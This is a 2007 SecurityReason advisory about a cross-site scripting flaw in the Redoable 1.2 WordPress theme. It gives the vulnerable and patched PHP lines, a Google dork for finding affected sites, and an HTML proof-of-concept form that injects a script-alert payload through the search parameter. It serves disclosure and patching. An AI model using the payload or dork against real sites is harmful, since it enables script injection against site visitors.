|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 2721 CVE : CVE-2007-2757 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : No Credit : John Martinelli Published : 22.05.2007
Advisory Text : note to editors: this patch resolves this vulnerability: http://redlevel.org/wp-content/uploads/patch.zip <!-- Redoable 1.2 - Cross-Site Scripting Vulnerability --------------- Vulnerable Code --------------- header.php (line 6): ... elseif (is_search()) { ?> Search for <?php echo $s } ... searchloop.php (line 24): elseif (is_search()) { printf(__('Search Results for '%s'','redo_domain'), $s); } ------------ Patched Code ------------ header.php (line 6 FIXED): ... elseif (is_search()) { ?> Search for <?php echo strip_tags($s); } ... searchloop.php (line 24 FIXED): elseif (is_search()) { printf(__('Search Results for '%s'','redo_domain'), strip_tags($s)); } Vulnerable Variable: s Vulnerable File: wp-content/themes/redoable/searchloop.php and header.php Vulnerable: Redoable 1.2 (other versions should also be vulnerable) Google d0rk: "and Redoable 1.2" John Martinelli john (at) martinelli (dot) com [email concealed] RedLevel Security http://www.RedLevel.org May 17th, 2007 !--> <html> <head><title>Redoable 1.2 - Cross-Site Scripting Vulnerability</title><body> <center><br><br> <font size=4>Redoable 1.2 - Cross-Site Scripting Vulnerability</font><br> <font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href="http://www.google.com/search?q=%22and+Redoable+1.2%22">"and Redoable 1.2"</a> </font><br><br><br> <center>file <b>index.php</b> - variable <b>s</b> - method <b>get</b></center><br> <form action="http://www.target.com/index.php" method="get"> <input size=75 name="s" value="</title><script>alert(1)</script>"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </form> </body></html> Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |